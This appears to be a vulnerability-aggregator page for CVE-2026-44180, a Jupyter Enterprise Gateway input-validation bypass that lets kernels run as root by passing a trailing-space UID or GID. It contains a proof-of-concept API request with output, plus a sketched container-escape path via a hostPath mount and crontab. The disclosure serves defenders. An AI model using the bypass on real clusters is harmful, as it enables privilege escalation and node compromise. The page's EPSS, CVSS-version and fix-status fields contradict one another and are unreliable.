CVE-2026-44180

CRITICALPre-NVD 9.89.8
EchelonGraph scoreLOW confidence

This critical-severity CVE scores 9.8 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.1%, top 71% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
9.8
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: 0%CVSS: 9.8Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Jupyter Enterprise Gateway: ContainerProcessProxy._enforce_prohibited_ids Bypass

Summary

Jupyter Enterprise Gateway has a prohibited UID and GID feature that by default prevents launching kernels with UID or GID 0 (root). This can be bypassed. It is possible to launch kernels with a prohibited UID and/or GID by using a specially crafted KERNEL_UID or KERNEL_GID value.

The feature is described in the documentation:

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/config-add-env.md?plain=1#L103-L107

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/config-add-env.md?plain=1#L88-L92

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/deploy-kubernetes.md?plain=1#L769

Details

The prohibited_uids and prohibited_uids are set based of the OS env var EG_PROHIBITED_UIDS and EG_PROHIBITED_GIDS, and default to the string 0.

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L29-L30

The checks https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L113 and https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L119 look for the user supplied KERNEL_UID / KERNEL_GID string in the prohibited_uids / prohibited_gids strings. These checks can be bypassed by including whitespace, for example the string 0 (trailing space).

The user supplied string is used in the Kubernetes manifest at https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L35 and https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L38 where they are parsed as an integer in the Jinja2 template - which will ignore the whitespace.

PoC

How it is meant to work

Trying 0 gets denied, as expected.

xh http://enterprise-gateway.bdawg.svc.cluster.local:8888/api/kernels name=python_kubernetes env:='{"KERNEL_POD_NAME":"bdawg", "KERNEL_UID": "0", "KERNEL_GID": "0"}'

HTTP/1.1 403 Kernel's UID value of '0' has been denied via EG_PROHIBITED_UIDS!
Content-Length: 94
Content-Type: application/json
Date: Mon, 14 Jul 2025 12:57:09 GMT
Server: TornadoServer/6.4.1
X-Content-Type-Options: nosniff

{
    "reason": "Kernel's UID value of '0' has been denied via EG_PROHIBITED_UIDS!",
    "message": ""
}

Exploit bypassing the checks

Using 0 with a trailing space, bypasses the check.

xh http://enterprise-gateway.bdawg.svc.cluster.local:8888/api/kernels name=python_kubernetes env:='{"KERNEL_POD_NAME":"bdawg", "KERNEL_UID": "0 ", "KERNEL_GID": "0 "}'

HTTP/1.1 201 Created
Content-Length: 172
Content-Type: application/json
Date: Mon, 14 Jul 2025 14:15:19 GMT
Location: /api/kernels/17eee032-994f-4dd2-8ade-87169c300a40
Server: TornadoServer/6.4.1
X-Content-Type-Options: nosniff

{
    "id": "17eee032-994f-4dd2-8ade-87169c300a40",
    "name": "python_kubernetes",
    "last_activity": "2025-07-14T14:15:21.468155Z",
    "execution_state": "starting",
    "connections": 0
}

The pod is successfully scheduled.

Inspecting the container we can see it is running as root:

kubectl exec -it pod/bdawg -- bash

(base) root@bdawg3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)

If we had not supplied the KERNEL_UID / KERNEL_GID the container would have been running as UID:GID 1000:100 (jovyan:users).

Impact

This input validation vulnerability allows running Jupyter kernels as root, which can be dangerous as it allows more attack surface, and may lead to container escapes, compromising the worker node and all workloads running on it. Repeated exploitation can compromise all worker nodes, and thus the entire Kubernetes cluster. It is possible to specify volume mounts, so one vector for a container escape is to use a hostPath R/W volume mount, use this UID/GID bypass to run as root, and then gain code execution in the underlying worker node by creating a crontab entry in the mounted host file system.

Organisations running Jupyter Enterprise Gateway to host Jupyter Kernels on at least Kubernetes clusters (I've tested this), and possibly on any other supported container orchestration systems or systems that utilise the KERNEL_UID and KERNEL_GID variables with the EG_PROHIBITED_UIDS and EG_PROHIBITED_GIDS feature.

CVSS v3
9.8
EG Score
9.8(low)
EPSS
28.5%
KEV
Not listed

Published

June 3, 2026

Last Modified

June 3, 2026

Vendor Advisories for CVE-2026-44180(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
PyPI(1)
PackageVulnerable rangeFixed inDependents
jupyter-enterprise-gateway2.0.0 ... 3.2.3 (23 versions)3.3.0

Data Freshness Timeline

(refreshed 9× in last 7d / 108× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

Showing the most recent 100 of 139 total refreshes for this CVE.

  1. 2026-07-09 06:31 UTCEG score recompute
  2. 2026-07-08 22:34 UTCEG score recompute
  3. 2026-07-08 16:18 UTCEG score recompute
  4. 2026-07-03 23:50 UTCEG score recompute
  5. 2026-07-03 19:35 UTCEG score recompute
  6. 2026-07-02 22:58 UTCEG score recompute
  7. 2026-07-02 18:30 UTCEG score recompute
  8. 2026-07-02 14:13 UTCEG score recompute
  9. 2026-07-02 09:59 UTCEG score recompute
  10. 2026-07-02 05:44 UTCEG score recompute
  11. 2026-07-02 01:30 UTCEG score recompute
  12. 2026-07-01 20:50 UTCEG score recompute
  13. 2026-07-01 16:36 UTCEG score recompute
  14. 2026-07-01 12:21 UTCEG score recompute
  15. 2026-07-01 08:01 UTCEG score recompute
  16. 2026-07-01 02:00 UTCEG score recompute
  17. 2026-06-30 21:46 UTCEG score recompute
  18. 2026-06-30 08:17 UTCEG score recompute
  19. 2026-06-30 03:55 UTCEG score recompute
  20. 2026-06-29 23:42 UTCEG score recompute
  21. 2026-06-29 19:28 UTCEG score recompute
  22. 2026-06-29 14:59 UTCEG score recompute
  23. 2026-06-29 10:45 UTCEG score recompute
  24. 2026-06-29 02:30 UTCEG score recompute
  25. 2026-06-28 22:15 UTCEG score recompute
Show 75 more
  1. 2026-06-28 18:01 UTCEG score recompute
  2. 2026-06-28 13:46 UTCEG score recompute
  3. 2026-06-28 09:32 UTCEG score recompute
  4. 2026-06-28 05:18 UTCEG score recompute
  5. 2026-06-28 01:05 UTCEG score recompute
  6. 2026-06-27 20:52 UTCEG score recompute
  7. 2026-06-27 16:38 UTCEG score recompute
  8. 2026-06-27 12:20 UTCEG score recompute
  9. 2026-06-27 08:05 UTCEG score recompute
  10. 2026-06-27 03:51 UTCEG score recompute
  11. 2026-06-26 23:37 UTCEG score recompute
  12. 2026-06-26 19:22 UTCEG score recompute
  13. 2026-06-26 15:09 UTCEG score recompute
  14. 2026-06-26 05:35 UTCEG score recompute
  15. 2026-06-26 01:21 UTCEG score recompute
  16. 2026-06-25 19:51 UTCEG score recompute
  17. 2026-06-25 15:36 UTCEG score recompute
  18. 2026-06-25 11:22 UTCEG score recompute
  19. 2026-06-25 07:07 UTCEG score recompute
  20. 2026-06-25 02:29 UTCEG score recompute
  21. 2026-06-24 22:14 UTCEG score recompute
  22. 2026-06-24 14:31 UTCEG score recompute
  23. 2026-06-24 09:14 UTCEG score recompute
  24. 2026-06-23 23:25 UTCEG score recompute
  25. 2026-06-23 18:57 UTCEG score recompute
  26. 2026-06-20 12:30 UTCEG score recompute
  27. 2026-06-19 20:30 UTCEG score recompute
  28. 2026-06-19 02:44 UTCEG score recompute
  29. 2026-06-18 21:31 UTCEG score recompute
  30. 2026-06-18 16:30 UTCEG score recompute
  31. 2026-06-18 07:46 UTCEG score recompute
  32. 2026-06-18 01:54 UTCEG score recompute
  33. 2026-06-17 21:40 UTCEG score recompute
  34. 2026-06-17 17:26 UTCEG score recompute
  35. 2026-06-17 11:50 UTCEG score recompute
  36. 2026-06-17 07:36 UTCEG score recompute
  37. 2026-06-17 03:13 UTCEG score recompute
  38. 2026-06-16 23:00 UTCEG score recompute
  39. 2026-06-16 18:45 UTCEG score recompute
  40. 2026-06-16 14:23 UTCEG score recompute
  41. 2026-06-16 09:46 UTCEG score recompute
  42. 2026-06-16 05:32 UTCEG score recompute
  43. 2026-06-16 01:18 UTCEG score recompute
  44. 2026-06-15 21:03 UTCEG score recompute
  45. 2026-06-15 16:20 UTCEG score recompute
  46. 2026-06-15 12:06 UTCEG score recompute
  47. 2026-06-15 07:37 UTCEG score recompute
  48. 2026-06-15 03:04 UTCEG score recompute
  49. 2026-06-14 23:18 UTCEPSS rescore
  50. 2026-06-14 22:50 UTCEG score recompute
  51. 2026-06-14 18:36 UTCEG score recompute
  52. 2026-06-14 14:22 UTCEG score recompute
  53. 2026-06-14 10:08 UTCEG score recompute
  54. 2026-06-14 05:52 UTCEG score recompute
  55. 2026-06-14 01:36 UTCEG score recompute
  56. 2026-06-13 23:00 UTCEPSS rescore
  57. 2026-06-13 21:17 UTCEG score recompute
  58. 2026-06-13 17:03 UTCEG score recompute
  59. 2026-06-13 12:26 UTCEG score recompute
  60. 2026-06-13 08:04 UTCEG score recompute
  61. 2026-06-13 03:51 UTCEG score recompute
  62. 2026-06-12 23:36 UTCEG score recompute
  63. 2026-06-12 23:12 UTCEPSS rescore
  64. 2026-06-12 19:23 UTCEG score recompute
  65. 2026-06-12 15:08 UTCEG score recompute
  66. 2026-06-12 10:53 UTCEG score recompute
  67. 2026-06-12 06:39 UTCEG score recompute
  68. 2026-06-12 02:26 UTCEG score recompute
  69. 2026-06-11 22:12 UTCEG score recompute
  70. 2026-06-11 17:59 UTCEG score recompute
  71. 2026-06-11 13:45 UTCEG score recompute
  72. 2026-06-11 09:31 UTCEG score recompute
  73. 2026-06-11 05:17 UTCEG score recompute
  74. 2026-06-11 01:03 UTCEG score recompute
  75. 2026-06-10 20:50 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-44180?
CVE-2026-44180 is a critical vulnerability published on June 3, 2026. Jupyter Enterprise Gateway: ContainerProcessProxy.enforceprohibited_ids Bypass Summary Jupyter Enterprise Gateway has a prohibited UID and GID feature that by default prevents launching kernels with UID or GID 0 (root). This can be bypassed. It is possible to launch kernels with a prohibited UID…
When was CVE-2026-44180 disclosed?
CVE-2026-44180 was first published in the National Vulnerability Database on June 3, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-44180 actively exploited?
CVE-2026-44180 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 28.5% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-44180?
CVE-2026-44180 has a CVSS v4.0 base score of 9.8 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-44180?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-44180, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-44180

Explore →

Is Your Infrastructure Affected by CVE-2026-44180?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.